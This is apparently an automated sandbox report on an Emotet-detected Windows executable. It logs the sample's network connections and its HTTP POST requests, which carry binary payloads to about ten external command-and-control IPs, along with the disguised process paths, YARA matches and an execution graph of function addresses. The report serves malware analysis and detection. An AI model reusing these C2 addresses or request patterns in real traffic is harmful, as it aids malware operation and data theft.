                                                                                    Nov 11, 2024 18:23:45.065167904 CET4998480192.168.2.745.46.37.97
                                                                                    Nov 11, 2024 18:23:45.071005106 CET804998445.46.37.97192.168.2.7
                                                                                    Nov 11, 2024 18:23:49.086641073 CET499857080192.168.2.7138.97.60.141
                                                                                    Nov 11, 2024 18:23:49.091598034 CET708049985138.97.60.141192.168.2.7
                                                                                    Nov 11, 2024 18:23:49.091666937 CET499857080192.168.2.7138.97.60.141
                                                                                    Nov 11, 2024 18:23:49.091840029 CET499857080192.168.2.7138.97.60.141
                                                                                    Nov 11, 2024 18:23:49.092222929 CET499857080192.168.2.7138.97.60.141
                                                                                    Nov 11, 2024 18:23:49.096898079 CET708049985138.97.60.141192.168.2.7
                                                                                    Nov 11, 2024 18:23:49.097011089 CET708049985138.97.60.141192.168.2.7
                                                                                    Nov 11, 2024 18:23:49.097132921 CET708049985138.97.60.141192.168.2.7
                                                                                    Nov 11, 2024 18:23:49.097146034 CET708049985138.97.60.141192.168.2.7
                                                                                    Nov 11, 2024 18:23:49.097343922 CET708049985138.97.60.141192.168.2.7
                                                                                    Nov 11, 2024 18:23:57.481935978 CET708049985138.97.60.141192.168.2.7
                                                                                    Nov 11, 2024 18:23:57.482017994 CET499857080192.168.2.7138.97.60.141
                                                                                    Nov 11, 2024 18:23:57.482162952 CET499857080192.168.2.7138.97.60.141
                                                                                    Nov 11, 2024 18:23:57.487051010 CET708049985138.97.60.141192.168.2.7
                                                                                    Nov 11, 2024 18:23:59.943147898 CET499868080192.168.2.7177.144.130.105
                                                                                    Nov 11, 2024 18:23:59.948381901 CET808049986177.144.130.105192.168.2.7
                                                                                    Nov 11, 2024 18:23:59.948525906 CET499868080192.168.2.7177.144.130.105
                                                                                    Nov 11, 2024 18:23:59.948657036 CET499868080192.168.2.7177.144.130.105
                                                                                    Nov 11, 2024 18:23:59.948718071 CET499868080192.168.2.7177.144.130.105
                                                                                    Nov 11, 2024 18:23:59.953505993 CET808049986177.144.130.105192.168.2.7
                                                                                    Nov 11, 2024 18:23:59.953594923 CET808049986177.144.130.105192.168.2.7
                                                                                    Nov 11, 2024 18:23:59.953605890 CET808049986177.144.130.105192.168.2.7
                                                                                    Nov 11, 2024 18:23:59.953649998 CET808049986177.144.130.105192.168.2.7
                                                                                    Nov 11, 2024 18:23:59.953660011 CET808049986177.144.130.105192.168.2.7
                                                                                    Nov 11, 2024 18:24:08.284365892 CET808049986177.144.130.105192.168.2.7
                                                                                    Nov 11, 2024 18:24:08.284549952 CET499868080192.168.2.7177.144.130.105
                                                                                    Nov 11, 2024 18:24:08.284629107 CET499868080192.168.2.7177.144.130.105
                                                                                    Nov 11, 2024 18:24:08.289580107 CET808049986177.144.130.105192.168.2.7
                                                                                    Nov 11, 2024 18:24:11.460161924 CET4998780192.168.2.7169.1.39.242
                                                                                    Nov 11, 2024 18:24:11.465339899 CET8049987169.1.39.242192.168.2.7
                                                                                    Nov 11, 2024 18:24:11.465428114 CET4998780192.168.2.7169.1.39.242
                                                                                    Nov 11, 2024 18:24:11.465689898 CET4998780192.168.2.7169.1.39.242
                                                                                    Nov 11, 2024 18:24:11.465728998 CET4998780192.168.2.7169.1.39.242
                                                                                    Nov 11, 2024 18:24:11.470717907 CET8049987169.1.39.242192.168.2.7
                                                                                    Nov 11, 2024 18:24:11.470725060 CET8049987169.1.39.242192.168.2.7
                                                                                    Nov 11, 2024 18:24:11.470733881 CET8049987169.1.39.242192.168.2.7
                                                                                    Nov 11, 2024 18:24:11.470740080 CET8049987169.1.39.242192.168.2.7
                                                                                    Nov 11, 2024 18:24:11.470879078 CET8049987169.1.39.242192.168.2.7
                                                                                    Nov 11, 2024 18:24:20.133462906 CET8049987169.1.39.242192.168.2.7
                                                                                    Nov 11, 2024 18:24:20.133558035 CET4998780192.168.2.7169.1.39.242
                                                                                    Nov 11, 2024 18:24:20.133641005 CET4998780192.168.2.7169.1.39.242
                                                                                    Nov 11, 2024 18:24:20.133893013 CET8049987169.1.39.242192.168.2.7
                                                                                    Nov 11, 2024 18:24:20.133945942 CET4998780192.168.2.7169.1.39.242
                                                                                    Nov 11, 2024 18:24:20.141896009 CET8049987169.1.39.242192.168.2.7
                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                    Nov 11, 2024 18:22:17.827318907 CET5237453192.168.2.71.1.1.1
                                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                    Nov 11, 2024 18:22:17.827318907 CET192.168.2.71.1.1.10x2ab7Standard query (0)time.windows.comA (IP address)IN (0x0001)false
                                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                    Nov 11, 2024 18:22:17.834407091 CET1.1.1.1192.168.2.70x2ab7No error (0)time.windows.comtwc.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                    • 190.202.229.74
                                                                                    • 118.69.11.81
                                                                                      • 118.69.11.81:7080
                                                                                    • 70.39.251.94
                                                                                      • 70.39.251.94:8080
                                                                                    • 87.230.25.43
                                                                                      • 87.230.25.43:8080
                                                                                    • 94.23.62.116
                                                                                      • 94.23.62.116:8080
                                                                                    • 37.187.161.206
                                                                                      • 37.187.161.206:8080
                                                                                    • 45.46.37.97
                                                                                    • 138.97.60.141
                                                                                      • 138.97.60.141:7080
                                                                                    • 177.144.130.105
                                                                                      • 177.144.130.105:8080
                                                                                    • 169.1.39.242
                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    0192.168.2.749766190.202.229.74807580C:\Windows\SysWOW64\winhttpcom\wpnclient.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Nov 11, 2024 18:22:28.038981915 CET547OUTPOST /NVYQ97TAZC9w/ HTTP/1.1
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                                                    Accept-Encoding: gzip, deflate
                                                                                    DNT: 1
                                                                                    Connection: keep-alive
                                                                                    Referer: 190.202.229.74/
                                                                                    Upgrade-Insecure-Requests: 1
                                                                                    Content-Type: multipart/form-data; boundary=----------------8meBuivDM6SGek6t
                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                    Host: 190.202.229.74
                                                                                    Content-Length: 4644
                                                                                    Cache-Control: no-cache
                                                                                    Nov 11, 2024 18:22:28.039041042 CET4644OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 6d 65 42 75 69 76 44 4d 36 53 47 65 6b 36 74 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 78 6a 78 66 67 6b
                                                                                    Data Ascii: ------------------8meBuivDM6SGek6tContent-Disposition: form-data; name="xjxfgktpayf"; filename="gmxiwfyqpa"Content-Type: application/octet-stream2h)gBmkxWz:@I\OFIQWQ!BgHgI2b$5%K


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1192.168.2.749852118.69.11.8170807580C:\Windows\SysWOW64\winhttpcom\wpnclient.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Nov 11, 2024 18:22:39.765384912 CET590OUTPOST /fcGeLw4p/ihOwVRSFxWUqd0kFgJ/4jfMfuO/EFhh74Ny/if77Qmg3AUNbSqT8W/ HTTP/1.1
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                                                    Accept-Encoding: gzip, deflate
                                                                                    DNT: 1
                                                                                    Connection: keep-alive
                                                                                    Referer: 118.69.11.81/
                                                                                    Upgrade-Insecure-Requests: 1
                                                                                    Content-Type: multipart/form-data; boundary=------------c0nWQm36OPQW
                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                    Host: 118.69.11.81:7080
                                                                                    Content-Length: 4644
                                                                                    Cache-Control: no-cache


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2192.168.2.74993670.39.251.9480807580C:\Windows\SysWOW64\winhttpcom\wpnclient.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Nov 11, 2024 18:22:51.358166933 CET566OUTPOST /cqrpaz30CJV6rcTaee/ HTTP/1.1
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                                                    Accept-Encoding: gzip, deflate
                                                                                    DNT: 1
                                                                                    Connection: keep-alive
                                                                                    Referer: 70.39.251.94/
                                                                                    Upgrade-Insecure-Requests: 1
                                                                                    Content-Type: multipart/form-data; boundary=----------------------K4vFIFYq3VJwQqSnJZgKHx
                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                    Host: 70.39.251.94:8080
                                                                                    Content-Length: 4628
                                                                                    Cache-Control: no-cache


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3192.168.2.74997887.230.25.4380807580C:\Windows\SysWOW64\winhttpcom\wpnclient.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Nov 11, 2024 18:23:00.457300901 CET594OUTPOST /RXVvzMf/N2ZJn/HWDPmWEOobR5vsovM/wC1leNEGWSEakmmN/GZFwmhHZxt53d/1udoH/ HTTP/1.1
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                                                    Accept-Encoding: gzip, deflate
                                                                                    DNT: 1
                                                                                    Connection: keep-alive
                                                                                    Referer: 87.230.25.43/
                                                                                    Upgrade-Insecure-Requests: 1
                                                                                    Content-Type: multipart/form-data; boundary=-----------MbOc2Awa9XJ
                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                    Host: 87.230.25.43:8080
                                                                                    Content-Length: 4628
                                                                                    Cache-Control: no-cache


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4192.168.2.74997994.23.62.11680807580C:\Windows\SysWOW64\winhttpcom\wpnclient.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Nov 11, 2024 18:23:12.462187052 CET574OUTPOST /MVkm4Pe/qvF8hKL0/xQboaYc/tEAE/bvOe1g/jyw23JOFoAe/ HTTP/1.1
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                                                    Accept-Encoding: gzip, deflate
                                                                                    DNT: 1
                                                                                    Connection: keep-alive
                                                                                    Referer: 94.23.62.116/
                                                                                    Upgrade-Insecure-Requests: 1
                                                                                    Content-Type: multipart/form-data; boundary=-----------anyJNRk198M
                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                    Host: 94.23.62.116:8080
                                                                                    Content-Length: 4612
                                                                                    Cache-Control: no-cache


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5192.168.2.74998337.187.161.20680807580C:\Windows\SysWOW64\winhttpcom\wpnclient.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Nov 11, 2024 18:23:24.590200901 CET583OUTPOST /L3q6/BqUpGZyIOtsBpT/0zFYv51ZlaEeQ4uYJ9/AHC3ud/VyzjKGaZCXONK/ HTTP/1.1
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                                                    Accept-Encoding: gzip, deflate
                                                                                    DNT: 1
                                                                                    Connection: keep-alive
                                                                                    Referer: 37.187.161.206/
                                                                                    Upgrade-Insecure-Requests: 1
                                                                                    Content-Type: multipart/form-data; boundary=--------TLs7tmoY
                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                    Host: 37.187.161.206:8080
                                                                                    Content-Length: 4612
                                                                                    Cache-Control: no-cache


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6192.168.2.74998445.46.37.97807580C:\Windows\SysWOW64\winhttpcom\wpnclient.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Nov 11, 2024 18:23:36.716316938 CET607OUTPOST /9AWvP9tUiB0vNBtHp/soehIFh6TFhjHQ8To/FvPsEJTxaNlNquPbdI/I8C2Lbudvo8T8/ HTTP/1.1
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                                                    Accept-Encoding: gzip, deflate
                                                                                    DNT: 1
                                                                                    Connection: keep-alive
                                                                                    Referer: 45.46.37.97/
                                                                                    Upgrade-Insecure-Requests: 1
                                                                                    Content-Type: multipart/form-data; boundary=---------------------9uUbHI4f4XOvefoNk2pHp
                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                    Host: 45.46.37.97
                                                                                    Content-Length: 4612
                                                                                    Cache-Control: no-cache
                                                                                    Nov 11, 2024 18:23:36.716373920 CET4612OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 39 75 55 62 48 49 34 66 34 58 4f 76 65 66 6f 4e 6b 32 70 48 70 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61
                                                                                    Data Ascii: -----------------------9uUbHI4f4XOvefoNk2pHpContent-Disposition: form-data; name="qwgld"; filename="tsknfqjdiig"Content-Type: application/octet-streamE*qnkt]4Q(gF(V^JP_@k-5=32xanZZgKc!V&


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7192.168.2.749985138.97.60.14170807580C:\Windows\SysWOW64\winhttpcom\wpnclient.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Nov 11, 2024 18:23:49.091840029 CET538OUTPOST /5ZnPdPFU/ HTTP/1.1
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                                                    Accept-Encoding: gzip, deflate
                                                                                    DNT: 1
                                                                                    Connection: keep-alive
                                                                                    Referer: 138.97.60.141/
                                                                                    Upgrade-Insecure-Requests: 1
                                                                                    Content-Type: multipart/form-data; boundary=------------Vb7iRWQMUdrr
                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                    Host: 138.97.60.141:7080
                                                                                    Content-Length: 4612
                                                                                    Cache-Control: no-cache


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    8192.168.2.749986177.144.130.10580807580C:\Windows\SysWOW64\winhttpcom\wpnclient.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Nov 11, 2024 18:23:59.948657036 CET654OUTPOST /2g3r3uVJyW4vwEwW2rV/BSwocEVkUzwjsP3EXb/tToQfSpvkbELnFp/GKhVdMsrUWytWXLFY/s5tFZi8Vxs3oBnZWiR/tXm8d1/ HTTP/1.1
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                                                    Accept-Encoding: gzip, deflate
                                                                                    DNT: 1
                                                                                    Connection: keep-alive
                                                                                    Referer: 177.144.130.105/
                                                                                    Upgrade-Insecure-Requests: 1
                                                                                    Content-Type: multipart/form-data; boundary=-----------------------Xese4L6C2RTuoGm0FY1zcNp
                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                    Host: 177.144.130.105:8080
                                                                                    Content-Length: 4612
                                                                                    Cache-Control: no-cache


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    9192.168.2.749987169.1.39.242807580C:\Windows\SysWOW64\winhttpcom\wpnclient.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Nov 11, 2024 18:24:11.465689898 CET568OUTPOST /XCULSRNtkPzEnoI/N2CP4bvAn2eR7Mn/ HTTP/1.1
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                                                    Accept-Encoding: gzip, deflate
                                                                                    DNT: 1
                                                                                    Connection: keep-alive
                                                                                    Referer: 169.1.39.242/
                                                                                    Upgrade-Insecure-Requests: 1
                                                                                    Content-Type: multipart/form-data; boundary=-------------------Za2AS9T3nIW3ZQcAbAN
                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                    Host: 169.1.39.242
                                                                                    Content-Length: 4612
                                                                                    Cache-Control: no-cache
                                                                                    Nov 11, 2024 18:24:11.465728998 CET4612OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 5a 61 32 41 53 39 54 33 6e 49 57 33 5a 51 63 41 62 41 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22
                                                                                    Data Ascii: ---------------------Za2AS9T3nIW3ZQcAbANContent-Disposition: form-data; name="lqskmjzzcrm"; filename="gqcovh"Content-Type: application/octet-streams9{MqcI_"3@h)\e5/CPbT!L-CD`t;qoj^B


                                                                                    Click to jump to process

                                                                                    Click to jump to process

                                                                                    Click to jump to process

                                                                                    Target ID:0
                                                                                    Start time:12:22:14
                                                                                    Start date:11/11/2024
                                                                                    Path:C:\Users\user\Desktop\mNtu4X8ZyE.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:"C:\Users\user\Desktop\mNtu4X8ZyE.exe"
                                                                                    Imagebase:0x400000
                                                                                    File size:479'232 bytes
                                                                                    MD5 hash:6E30D8BDA11412A2272A387B549BE17A
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Yara matches:
                                                                                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000000.00000002.1306329295.0000000002671000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000000.00000002.1306249932.0000000002614000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000000.00000002.1306123613.0000000002210000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                    Reputation:low
                                                                                    Has exited:true

                                                                                    Target ID:2
                                                                                    Start time:12:22:15
                                                                                    Start date:11/11/2024
                                                                                    Path:C:\Windows\SysWOW64\expand\regedit.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:"C:\Windows\SysWOW64\expand\regedit.exe"
                                                                                    Imagebase:0x400000
                                                                                    File size:479'232 bytes
                                                                                    MD5 hash:6E30D8BDA11412A2272A387B549BE17A
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Yara matches:
                                                                                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000002.00000002.1322151004.0000000001FD0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000002.00000002.1322291450.0000000002154000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000002.00000002.1322392048.00000000021B1000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                    Reputation:low
                                                                                    Has exited:true

                                                                                    Target ID:3
                                                                                    Start time:12:22:15
                                                                                    Start date:11/11/2024
                                                                                    Path:C:\Windows\System32\svchost.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\svchost.exe -k LocalService -s W32Time
                                                                                    Imagebase:0x7ff7b4ee0000
                                                                                    File size:55'320 bytes
                                                                                    MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:false

                                                                                    Target ID:4
                                                                                    Start time:12:22:16
                                                                                    Start date:11/11/2024
                                                                                    Path:C:\Windows\SysWOW64\winhttpcom\wpnclient.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:"C:\Windows\SysWOW64\winhttpcom\wpnclient.exe"
                                                                                    Imagebase:0x400000
                                                                                    File size:479'232 bytes
                                                                                    MD5 hash:6E30D8BDA11412A2272A387B549BE17A
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Yara matches:
                                                                                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000004.00000002.2542043862.00000000021E1000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000004.00000002.2541675452.0000000000590000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000004.00000002.2541960416.0000000002184000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                    Reputation:low
                                                                                    Has exited:false

                                                                                    Reset < >

                                                                                      Execution Graph

                                                                                      Execution Coverage:5.6%
                                                                                      Dynamic/Decrypted Code Coverage:96.3%
                                                                                      Signature Coverage:14.6%
                                                                                      Total number of Nodes:969
                                                                                      Total number of Limit Nodes:22
                                                                                      execution_graph 13176 2676060 13184 2676860 13176->13184 13178 2676065 13179 2676089 ExitProcess 13178->13179 13180 2674190 GetPEB 13178->13180 13181 2676078 13180->13181 13182 26740f0 GetPEB 13181->13182 13183 2676084 13182->13183 13183->13179 13193 267687d 13184->13193 13186 2677312 13505 267b6d0 13186->13505 13187 2676aee 13188 267700a GetTickCount 13187->13188 13187->13193 13196 2674190 GetPEB 13187->13196 13213 26740f0 GetPEB 13187->13213 13349 2678330 13187->13349 13398 26786f0 13187->13398 13411 26773c0 13187->13411 13188->13193 13191 26772fd 13191->13178 13193->13186 13193->13187 13193->13188 13193->13191 13195 26772c5 13193->13195 13203 2674570 GetPEB 13193->13203 13208 2677305 13193->13208 13209 2674190 GetPEB 13193->13209 13221 26740f0 GetPEB 13193->13221 13227 26744b0 GetPEB 13193->13227 13228 2678f20 13193->13228 13238 2679b40 13193->13238 13250 2678ca0 13193->13250 13261 267a230 13193->13261 13270 2676360 13193->13270 13285 267b3d0 13193->13285 13290 267b820 13193->13290 13297 26793b0 13193->13297 13311 2676490 13193->13311 13323 26797d0 13193->13323 13330 2674ac0 13193->13330 13340 26791e0 13193->13340 13362 2675720 13193->13362 13367 26795d0 13193->13367 13378 26712b0 13193->13378 13404 26776b0 13193->13404 13419 267b5c0 13193->13419 13424 2677570 13193->13424 13434 2673440 13193->13434 13444 26718c0 13193->13444 13459 2673590 13193->13459 13469 2679910 13193->13469 13478 2678a70 13195->13478 13196->13187 13203->13193 13496 26790b0 13208->13496 13209->13193 13212 26772ca 13212->13178 13213->13187 13219 267730a 13219->13178 13221->13193 13227->13193 13236 2678f34 13228->13236 13229 2679093 13536 26737e0 13229->13536 13232 2679067 13232->13193 13233 267909c 13233->13193 13235 2674190 GetPEB 13235->13236 13236->13229 13236->13232 13236->13235 13237 26740f0 GetPEB 13236->13237 13510 26738b0 13236->13510 13556 26735f0 13236->13556 13237->13236 13248 2679b60 13238->13248 13239 2679e3b 13240 2679e5a 13239->13240 13242 2674190 GetPEB 13239->13242 13576 2673190 13240->13576 13243 2679e4e 13242->13243 13245 26740f0 GetPEB 13243->13245 13244 26740f0 GetPEB 13244->13248 13245->13240 13247 2679c54 13247->13193 13248->13239 13248->13244 13248->13247 13249 2674190 GetPEB 13248->13249 13566 2677ee0 13248->13566 13249->13248 13260 2678cbd 13250->13260 13251 2678ee4 13253 2674190 GetPEB 13251->13253 13254 2678de5 13251->13254 13252 26735f0 GetPEB 13252->13260 13255 2678ef7 13253->13255 13254->13193 13257 26740f0 GetPEB 13255->13257 13256 2674190 GetPEB 13256->13260 13257->13254 13259 26740f0 GetPEB 13259->13260 13260->13251 13260->13252 13260->13254 13260->13256 13260->13259 13598 2675390 13260->13598 13268 267a240 13261->13268 13262 267a310 13263 267a29e 13262->13263 13264 2674190 GetPEB 13262->13264 13263->13193 13265 267a323 13264->13265 13267 26740f0 GetPEB 13265->13267 13266 2674190 GetPEB 13266->13268 13267->13263 13268->13262 13268->13263 13268->13266 13269 26740f0 GetPEB 13268->13269 13269->13268 13625 2675850 13270->13625 13272 2676374 13273 26763a2 13272->13273 13274 267642b 13272->13274 13275 2674190 GetPEB 13272->13275 13278 26740f0 GetPEB 13272->13278 13273->13193 13635 26736f0 13274->13635 13275->13272 13277 2676436 13279 2676457 13277->13279 13280 2674190 GetPEB 13277->13280 13278->13272 13283 2673590 GetPEB 13279->13283 13281 267644b 13280->13281 13282 26740f0 GetPEB 13281->13282 13282->13279 13284 2676479 13283->13284 13284->13193 13286 267b4f1 13285->13286 13289 267b3e8 13285->13289 13286->13193 13287 26740f0 GetPEB 13287->13289 13288 2674190 GetPEB 13288->13289 13289->13286 13289->13287 13289->13288 13292 267b830 13290->13292 13291 267b8aa 13291->13193 13292->13291 13645 267a460 13292->13645 13665 267af30 13292->13665 13681 267a930 13292->13681 13695 267ab40 13292->13695 13300 26793d0 13297->13300 13298 2679539 13298->13193 13299 2679549 13301 2674190 GetPEB 13299->13301 13304 2679583 13299->13304 13300->13298 13300->13299 13302 26740f0 GetPEB 13300->13302 13307 2674190 GetPEB 13300->13307 13303 2679577 13301->13303 13302->13300 13305 26740f0 GetPEB 13303->13305 13306 26795ab 13304->13306 13308 2674190 GetPEB 13304->13308 13305->13304 13306->13193 13307->13300 13309 267959f 13308->13309 13310 26740f0 GetPEB 13309->13310 13310->13306 13313 26764b2 13311->13313 13312 2676730 13312->13193 13316 267665b 13313->13316 13317 2674610 GetPEB 13313->13317 13318 2674190 GetPEB 13313->13318 13320 26766ca 13313->13320 13321 26740f0 GetPEB 13313->13321 13815 2675900 13313->13815 13824 2674fd0 13313->13824 13314 2674190 GetPEB 13314->13320 13316->13193 13317->13313 13318->13313 13320->13312 13320->13314 13322 26740f0 GetPEB 13320->13322 13321->13313 13322->13320 13327 26797f0 13323->13327 13324 2674fd0 GetPEB 13324->13327 13325 26798bc 13325->13193 13327->13324 13327->13325 13328 2674190 GetPEB 13327->13328 13329 26740f0 GetPEB 13327->13329 13833 2674a10 13327->13833 13328->13327 13329->13327 13331 2674ad5 13330->13331 13333 2674aeb 13330->13333 13332 2674190 GetPEB 13331->13332 13336 2674adf 13332->13336 13334 2674b13 13333->13334 13335 2674190 GetPEB 13333->13335 13334->13193 13337 2674b07 13335->13337 13338 26740f0 GetPEB 13336->13338 13339 26740f0 GetPEB 13337->13339 13338->13333 13339->13334 13347 2679200 13340->13347 13341 2679375 13342 2674190 GetPEB 13341->13342 13345 2679301 13341->13345 13344 2679388 13342->13344 13343 2674190 GetPEB 13343->13347 13346 26740f0 GetPEB 13344->13346 13345->13193 13346->13345 13347->13341 13347->13343 13347->13345 13348 26740f0 GetPEB 13347->13348 13348->13347 13361 2678442 13349->13361 13350 26786b6 13351 26786d5 13350->13351 13355 2674190 GetPEB 13350->13355 13351->13187 13352 26735f0 GetPEB 13352->13361 13353 2678532 SetFileInformationByHandle 13353->13361 13354 267869f 13354->13187 13356 26786c9 13355->13356 13358 26740f0 GetPEB 13356->13358 13357 26784aa CreateFileW 13357->13351 13357->13361 13358->13351 13359 2674190 GetPEB 13359->13361 13360 26740f0 GetPEB 13360->13361 13361->13350 13361->13352 13361->13353 13361->13354 13361->13357 13361->13359 13361->13360 13365 2675730 13362->13365 13363 26757fa 13363->13193 13364 2674190 GetPEB 13364->13365 13365->13363 13365->13364 13366 26740f0 GetPEB 13365->13366 13366->13365 13372 26795f0 13367->13372 13368 2674190 GetPEB 13368->13372 13370 2674570 GetPEB 13370->13372 13371 2679799 13373 2679628 13371->13373 13375 2674190 